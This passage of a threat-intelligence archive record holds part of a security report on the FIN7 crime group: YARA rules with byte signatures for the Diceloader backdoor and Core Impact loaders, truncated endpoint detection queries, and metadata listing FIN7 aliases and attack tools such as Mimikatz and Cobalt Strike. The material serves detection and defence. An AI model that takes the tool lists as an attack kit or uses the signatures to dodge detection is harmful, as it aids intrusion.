strings:\r\n        $regex_packer_signature = /function\\s[0-9a-zA-Z]{3,7}\\r?\\n\\{\\r?\\n(\\$[0-9a-zA-Z]{3,7}=.*\\r?\\\r\n    condition:\r\n        filesize \u003e 50KB and filesize \u003c 5MB and $regex_packer_signature\r\n}\r\nrule Win32_Diceloader {\r\n    meta:\r\n        author = \"Antonio Cocomazzi @ SentinelOne\"\r\n        description = \"Detects Diceloader, aka Lizar/IceBot, a backdoor designed to infiltrate enterp\r\n        date = \"2023-04-17\"\r\n        reference1 = \"https://s1.ai/FIN7-u\"\r\n        hash = \"0aeab70affcab0f1e96c62c25dd41dc32d41e2ea\"\r\n    strings:\r\n        $code1 = { 41 F7 ?? 41 03 ?? C1 FA 04 8B C2 C1 E8 1F 03 D0 6B C2 1F 44 ?? ?? 41 ?? ?? 01 }\r\n        $code2 = { B9 02 02 00 00 48 8D ?? ?? ?? ?? ?? ?? [40-50] C7 ?? ?? ?? 47 6C 6F 62 C7 ?? ?? ??\r\n        $code3 = { C7 ?? ?? 47 6C 6F 62 [0-6] C7 ?? ?? 61 6C 5C 25 [0-6] C7 ?? ?? 30 38 78 00 [10-14\r\n    condition:\r\n        uint16(0) == 0x5A4D and filesize \u003c 60KB and 1 of ($code*)\r\n}\r\nrule PIC_CoreImpact_loader {\r\n    meta:\r\n        author = \"Antonio Cocomazzi @ SentinelOne\"\r\n        description = \"Detects Position Independent Code of Core Impact loaders observed in the wild\r\n        date = \"2023-04-17\"\r\n        reference1 = \"https://s1.ai/FIN7-u\"\r\n        hash = \"52e261a7cab837489dfcb8cd49aaf82ee287968c\"\r\n    strings:\r\n        $code1 = { E9 [4] 5B 48 B9 [8] 49 BA [70-100] E9 05 00 00 00 E8 }\r\n        $code2 = { E9 [4] 5B 53 48 BB [12] 49 BB [50-60] E9 05 00 00 00 E8 }\r\n        $code3 = { E9 [4] 5B 48 B9 [10] 49 BC [70-100] E9 05 00 00 00 E8 }\r\n        $code4 = { E9 [4] 5B ?? ?? 
49 BB [14] 48 B8 [70-100] E9 05 00 00 00 E8 }\r\n $code5 = { E9 [4] 5B ?? 48 B8 [13] 48 B9 [50-60] E9 05 00 00 00 E8}\r\n $code6 = { E9 [4] 5B ?? 48 B8 [12] 49 BD [70-100] E9 05 00 00 00 E8}\r\n $code7 = { E9 [4] 5B 48 B9 [9] 48 BA [70-100] E9 05 00 00 00 E8}\r\n condition:\r\n 1 of ($code*)\r\n}\r\nSentinelOne Singularity STAR Rules\r\nendpoint.os = 'windows' and meta.event.name = 'SCHEDTASKREGISTER' and src.process.cmdline contains (\r\nendpoint.os = 'windows' and meta.event.name = 'BEHAVIORALINDICATORS' and indicator.name = 'MultipleHo\r\nendpoint.os = 'windows' and meta.event.name ='SCRIPTS' and src.process.name = 'powershell.exe' and cm\r\nSource: https://www.sentinelone.com/labs/fin7-reboot-cybercrime-gang-enhances-ops-with-new-edr-bypasses-and-automated-attacks/\r\nhttps://www.sentinelone.com/labs/fin7-reboot-cybercrime-gang-enhances-ops-with-new-edr-bypasses-and-automated-attacks/\r\nPage 21 of 21",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"ETDA"
	],
	"references": [
		"https://www.sentinelone.com/labs/fin7-reboot-cybercrime-gang-enhances-ops-with-new-edr-bypasses-and-automated-attacks/"
	],
	"report_names": [
		"fin7-reboot-cybercrime-gang-enhances-ops-with-new-edr-bypasses-and-automated-attacks"
	],
	"threat_actors": [
		{
			"id": "c9617bb6-45c8-495e-9759-2177e61a8e91",
			"created_at": "2022-10-25T15:50:23.405039Z",
			"updated_at": "2026-04-10T02:00:05.387643Z",
			"deleted_at": null,
			"main_name": "Carbanak",
			"aliases": [
				"Carbanak",
				"Anunak"
			],
			"source_name": "MITRE:Carbanak",
			"tools": [
				"Carbanak",
				"Mimikatz",
				"PsExec",
				"netsh"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "9de1979b-40fc-44dc-855d-193edda4f3b8",
			"created_at": "2025-08-07T02:03:24.92723Z",
			"updated_at": "2026-04-10T02:00:03.755516Z",
			"deleted_at": null,
			"main_name": "GOLD LOCUST",
			"aliases": [
				"Anunak",
				"Carbanak",
				"Carbon Spider ",
				"FIN7 ",
				"Silicon "
			],
			"source_name": "Secureworks:GOLD LOCUST",
			"tools": [
				"Carbanak"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "bb8702c5-52ac-4359-8409-998a7cc3eeaf",
			"created_at": "2023-01-06T13:46:38.405479Z",
			"updated_at": "2026-04-10T02:00:02.961112Z",
			"deleted_at": null,
			"main_name": "FIN7",
			"aliases": [
				"ATK32",
				"G0046",
				"G0008",
				"Sangria Tempest",
				"ELBRUS",
				"GOLD NIAGARA",
				"Coreid",
				"Carbanak",
				"Carbon Spider",
				"JokerStash",
				"CARBON SPIDER"
			],
			"source_name": "MISPGALAXY:FIN7",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "ed3810b7-141a-4ed0-8a01-6a972b80458d",
			"created_at": "2022-10-25T16:07:23.443259Z",
			"updated_at": "2026-04-10T02:00:04.602946Z",
			"deleted_at": null,
			"main_name": "Carbanak",
			"aliases": [
				"Anunak",
				"Carbanak",
				"Carbon Spider",
				"ELBRUS",
				"G0008",
				"Gold Waterfall",
				"Sangria Tempest"
			],
			"source_name": "ETDA:Carbanak",
			"tools": [
				"AVE_MARIA",
				"Agentemis",
				"AmmyyRAT",
				"Antak",
				"Anunak",
				"Ave Maria",
				"AveMariaRAT",
				"BABYMETAL",
				"BIRDDOG",
				"Backdoor Batel",
				"Batel",
				"Bateleur",
				"BlackMatter",
				"Boostwrite",
				"Cain \u0026 Abel",
				"Carbanak",
				"Cl0p",
				"Cobalt Strike",
				"CobaltStrike",
				"DNSMessenger",
				"DNSRat",
				"DNSbot",
				"DRIFTPIN",
				"DarkSide",
				"FOXGRABBER",
				"FlawedAmmyy",
				"HALFBAKED",
				"JS Flash",
				"KLRD",
				"MBR Eraser",
				"Mimikatz",
				"Nadrac",
				"Odinaff",
				"POWERPIPE",
				"POWERSOURCE",
				"PsExec",
				"SQLRAT",
				"Sekur",
				"Sekur RAT",
				"SocksBot",
				"SoftPerfect Network Scanner",
				"Spy.Agent.ORM",
				"TEXTMATE",
				"TeamViewer",
				"TiniMet",
				"TinyMet",
				"Toshliph",
				"VB Flash",
				"WARPRISM",
				"avemaria",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f4f16213-7a22-4527-aecb-b964c64c2c46",
			"created_at": "2024-06-19T02:03:08.090932Z",
			"updated_at": "2026-04-10T02:00:03.6289Z",
			"deleted_at": null,
			"main_name": "GOLD NIAGARA",
			"aliases": [
				"Calcium ",
				"Carbanak",
				"Carbon Spider ",
				"FIN7 ",
				"Navigator ",
				"Sangria Tempest ",
				"TelePort Crew "
			],
			"source_name": "Secureworks:GOLD NIAGARA",
			"tools": [
				"Bateleur",
				"Carbanak",
				"Cobalt Strike",
				"DICELOADER",
				"DRIFTPIN",
				"GGLDR",
				"GRIFFON",
				"JSSLoader",
				"Meterpreter",
				"OFFTRACK",
				"PILLOWMINT",
				"POWERTRASH",
				"SUPERSOFT",
				"TAKEOUT",
				"TinyMet"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "bfded1cf-be73-44f9-a391-0751c9996f9a",
			"created_at": "2022-10-25T15:50:23.337107Z",
			"updated_at": "2026-04-10T02:00:05.252413Z",
			"deleted_at": null,
			"main_name": "FIN7",
			"aliases": [
				"FIN7",
				"GOLD NIAGARA",
				"ITG14",
				"Carbon Spider",
				"ELBRUS",
				"Sangria Tempest"
			],
			"source_name": "MITRE:FIN7",
			"tools": [
				"Mimikatz",
				"AdFind",
				"JSS Loader",
				"HALFBAKED",
				"REvil",
				"PowerSploit",
				"CrackMapExec",
				"Carbanak",
				"Pillowmint",
				"Cobalt Strike",
				"POWERSOURCE",
				"RDFSNIFFER",
				"SQLRat",
				"Lizar",
				"TEXTMATE",
				"BOOSTWRITE"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d85adfe3-e1c3-40b0-b8bb-d1bacadc4d82",
			"created_at": "2022-10-25T16:07:23.619566Z",
			"updated_at": "2026-04-10T02:00:04.690061Z",
			"deleted_at": null,
			"main_name": "FIN7",
			"aliases": [
				"APT-C-11",
				"ATK 32",
				"G0046",
				"Gold Niagara",
				"GrayAlpha",
				"ITG14",
				"TAG-CR1"
			],
			"source_name": "ETDA:FIN7",
			"tools": [
				"7Logger",
				"Agentemis",
				"Anubis Backdoor",
				"Anunak",
				"Astra",
				"BIOLOAD",
				"BIRDWATCH",
				"Bateleur",
				"Boostwrite",
				"CROWVIEW",
				"Carbanak",
				"Cobalt Strike",
				"CobaltStrike",
				"DICELOADER",
				"DNSMessenger",
				"FOWLGAZE",
				"HALFBAKED",
				"JSSLoader",
				"KillACK",
				"LOADOUT",
				"Lizar",
				"Meterpreter",
				"Mimikatz",
				"NetSupport",
				"NetSupport Manager",
				"NetSupport Manager RAT",
				"NetSupport RAT",
				"NetSupportManager RAT",
				"POWERPLANT",
				"POWERSOURCE",
				"RDFSNIFFER",
				"Ragnar Loader",
				"SQLRAT",
				"Sardonic",
				"Sekur",
				"Sekur RAT",
				"TEXTMATE",
				"Tirion",
				"VB Flash",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434742,
	"ts_updated_at": 1775792152,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/0434a411803905bad418971f437d75694530be03.pdf",
		"text": "https://archive.orkl.eu/0434a411803905bad418971f437d75694530be03.txt",
		"img": "https://archive.orkl.eu/0434a411803905bad418971f437d75694530be03.jpg"
	}
}